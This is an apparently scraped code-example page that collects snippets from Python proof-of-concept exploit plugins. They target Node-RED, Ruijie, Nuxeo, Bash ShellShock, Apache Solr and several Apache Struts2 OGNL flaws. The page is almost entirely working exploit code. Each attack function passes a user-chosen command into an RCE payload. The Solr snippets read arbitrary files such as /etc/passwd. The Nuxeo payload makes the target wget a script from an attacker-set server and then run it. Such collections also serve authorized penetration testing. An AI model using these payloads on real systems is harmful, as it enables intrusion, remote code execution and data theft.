"{}/flows".format(url),
json=payload,
headers=headers
)
resp = requests.post("{}/inject/{}".format(url, INJECT_BLOCK_NAME), headers=headers)
output = None
if not shell:
while output is None:
response = await websocket.recv()
messages = json.loads(response)
for message in messages:
if "topic" in message and message["topic"] == "debug":
output = message["data"]["msg"].strip()
break
except KeyboardInterrupt:
payload = {"flows": []}
for current_block in current_flows["flows"]:
tainted = False
for block in EXEC_FLOW:
if block["id"] == current_block["id"]:
tainted = True
if not tainted:
payload["flows"].append(current_block)
print("\n[+] Cleaning up workflows.")
resp = requests.post(
"{}/flows".format(url),
json=payload,
headers=headers
)
if resp.status_code == 200:
print("[+] Done.")
else:
print("[!] An error occured. Manual cleanup might be required.")
finally:
websocket.close()
return output
def start(url, command, username, password, shell=False):
0
Source : ruijie_info.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
####
headers = {
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20"
}
path = "login.php"
verify_code = '"role":"super_admin","name":"'
verify_code2 = '","password":"'
url = urljoin(self.url, path)
resp = requests.get(url=url, headers=headers, timeout=8)
# resp = requests.post(url, data=payload)
try:
if verify_code in resp.text and verify_code2 in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = "源代码密码泄露,页面搜索admin关键词即可看到密码hash"
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def parse_output(self, result):
0
Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
result = {}
httpServerIp = self.get_option('http_server_ip')
httpServerPort = self.get_option('http_server_port')
# 因为使用了format对字符串格式化, 故需要在原来的payload里多加一层{},否则会报错
payload_part1 = "/?key=#{{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
"---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
"'wget {0}:{1}/note.py')}}".format(httpServerIp, httpServerPort)
url = urljoin(self.url, "/nuxeo/create_file.xhtml")
params = {
'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
'directoryNameForPopup': payload_part1
}
try:
rr = requests.get(url, params=params, verify=False)
if rr.status_code == 302 or rr.status_code == 200:
result['status'] = 'success'
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def _attack(self):
0
Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _shell(self):
self._verify()
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
payload_part2 = "/?key=#{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
"---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
"'python note.py')}"
url = urljoin(self.url, "/nuxeo/create_file.xhtml")
params = {
'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
'directoryNameForPopup': payload_part2
}
try:
rr = requests.get(url, params=params, verify=False)
if rr.status_code == 302 or rr.status_code == 200:
pass
except ReadTimeout:
pass
except Exception as e:
pass
register_poc(DemoPOC)
0
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
try:
vul_url = get_url_need(self.url)
if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):
pass
else:
random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
headers_fake = {}
headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str
response = requests.get(vul_url, headers=headers_fake)
response = response.text
if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
except Exception as e:
logger.exception(e)
return self.parse_output(result)
def parse_output(self, result):
0
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def get_link(url):
rnt = ''
try:
page_content = requests.get(url).text
match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
for item_url in match:
if not item_url.startswith('http'):
item_url = getAbsoluteURL(url, item_url)
if not is_url_exist(item_url):
continue
if isSameDomain(item_url, url):
rnt = item_url
break
return rnt
except:
# raise e
return rnt
def getAbsoluteURL(base, url):
0
Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8983]
for port in ports:
target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
# 获取core
url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
response = req.get(url1, headers=headers,timeout=5)
core_name = list(json.loads(response.text)["status"])[0]
# 开启equestDispatcher.requestParsers.enableRemoteStreaming
url2 = target + "/solr/" + core_name + "/config"
headers = {"Content-type":"application/json"}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
response = req.get(url2, data=data,headers=headers, timeout=5)
if 'responseHeader' in response.text and response.status_code == 200:
# 读取文件
url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = 'stream.url=file:///etc/passwd'
response = req.get(url3, data=data, headers=headers, timeout=5)
if 'No such file or directory' not in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
break
return self.parse_output(result)
def _attack(self):
0
Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8983]
for port in ports:
target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
# 获取core
url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
response = req.get(url1, headers=headers, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
# 开启equestDispatcher.requestParsers.enableRemoteStreaming
url2 = target + "/solr/" + core_name + "/config"
headers = {"Content-type":"application/json"}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
response = req.get(url2, data=data,headers=headers, timeout=5)
if 'responseHeader' in response.text and response.status_code == 200:
# 读取文件
filename = self.get_option("filename")
url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = 'stream.url=file://{}'.format(filename)
response = req.get(url3, data=data, headers=headers, timeout=5)
if 'No such file or directory' not in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
result['extra'] = {}
result['extra']['evidence'] = response.text
break
return self.parse_output(result)
def _shell(self):
0
Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = "echo VuLnEcHoPoCSuCCeSS"
payload = '?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%' \
'23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio' \
'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%' \
'27RECOMMAND%27%29.getInputStream%28%29%29)'
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
flag = "VuLnEcHoPoCSuCCeSS"
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200 and flag in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = self.get_option("command")
payload = '?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%' \
'23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio' \
'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%' \
'27RECOMMAND%27%29.getInputStream%28%29%29)'
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200:
result['Stdout'] = response.text
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
register_poc(DemoPOC)
0
Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = "echo VuLnEcHoPoCSuCCeSS"
payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false)," \
"+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(" \
"%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a)," \
"%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d)," \
"%[email protected]@getResponse().getWriter(),%23kxlzx.println(" \
"%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] "
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
flag = "VuLnEcHoPoCSuCCeSS"
try:
response = requests.get(url, headers=HEADERS, data=payload)
if response and response.status_code == 200 and flag in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Postdata'] = payload
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = self.get_option("command")
payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false)," \
"+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(" \
"%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a)," \
"%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d)," \
"%[email protected]@getResponse().getWriter(),%23kxlzx.println(" \
"%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] "
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
try:
response = requests.get(url, headers=HEADERS, data=payload)
if response and response.status_code == 200:
result['Stdout'] = response.text
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
register_poc(DemoPOC)
0
Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = "echo VuLnEcHoPoCSuCCeSS"
payload = '?233=%24%7B%23_memberAccess%5B"allowStaticMetho' \
'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()' \
'.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.' \
'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%' \
'23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%' \
'3D%40org.apache.struts2.ServletActionContext%40getResponse().ge' \
'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str' \
'ing(%23d))%2C%23out.close()%7D'
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
flag = "VuLnEcHoPoCSuCCeSS"
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200 and flag in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = self.get_option("command")
payload = '?233=%24%7B%23_memberAccess%5B"allowStaticMetho' \
'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()' \
'.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.' \
'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%' \
'23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%' \
'3D%40org.apache.struts2.ServletActionContext%40getResponse().ge' \
'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str' \
'ing(%23d))%2C%23out.close()%7D'
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200:
result['Stdout'] = response.text
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
register_poc(DemoPOC)
0
Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = "echo VuLnEcHoPoCSuCCeSS"
# vulmap这个地方的payload是写死了的,执行的命令为id,执行的结果会在404页面显示出来
payload = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \
r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \
r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \
r"utStream())}.action"
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
flag = "VuLnEcHoPoCSuCCeSS"
try:
response = requests.get(url, headers=HEADERS)
if response.status_code == 404 and flag in response.text: # 这个地方不能判断response对象存在
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = self.get_option("command")
# vulmap这个地方的payload是写死了的,执行的命令为id,执行的结果会在404页面显示出来
payload = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \
r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \
r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \
r"utStream())}.action"
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
try:
response = requests.get(url, headers=HEADERS)
if response.status_code == 404: # 这个地方不能判断response对象存在
res = parse.unquote(str(re.findall(r" < p> < b>Message < /b>(.*?) < /p>", response.content.decode('utf-8'))))
result['Stdout'] = res
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
register_poc(DemoPOC)
0
Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = "echo VuLnEcHoPoCSuCCeSS"
payload = r"?redirect:${%23req%3d%23context.get(%27co%27" \
r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \
r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java" \
r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27." \
r"toString().split(%27\\s%27))).start().getInputStream()).useDel" \
r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27," \
r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony" \
r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes" \
r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27)," \
r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush" \
r"(),%23resp.getWriter().close()}"
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
flag = "VuLnEcHoPoCSuCCeSS"
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200 and flag in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = self.get_option("command")
payload = r"?redirect:${%23req%3d%23context.get(%27co%27" \
r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \
r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java" \
r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27." \
r"toString().split(%27\\s%27))).start().getInputStream()).useDel" \
r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27," \
r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony" \
r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes" \
r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27)," \
r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush" \
r"(),%23resp.getWriter().close()}"
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200:
result['Stdout'] = response.text
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
register_poc(DemoPOC)
0
Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = "echo VuLnEcHoPoCSuCCeSS"
payload = r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected" \
r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti" \
r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce" \
r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a" \
r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream" \
r"()))"
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
flag = "VuLnEcHoPoCSuCCeSS"
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200 and flag in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _attack(self):
HEADERS = {
'Accept': 'application/x-shockwave-flash,'
'image/gif,'
'image/x-xbitmap,'
'image/jpeg,'
'image/pjpeg,'
'application/vnd.ms-excel,'
'application/vnd.ms-powerpoint,'
'application/msword,'
'*/*',
'Content-Type': 'application/x-www-form-urlencoded'
}
result = {}
cmd = self.get_option("command")
payload = r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected" \
r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti" \
r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce" \
r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a" \
r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream" \
r"()))"
payload = payload.replace("RECOMMAND", cmd)
url = self.url + payload
try:
response = requests.get(url, headers=HEADERS)
if response and response.status_code == 200:
result['Stdout'] = response.text
except ReadTimeout:
pass
except Exception as e:
pass
return self.parse_output(result)
register_poc(DemoPOC)
See More Examples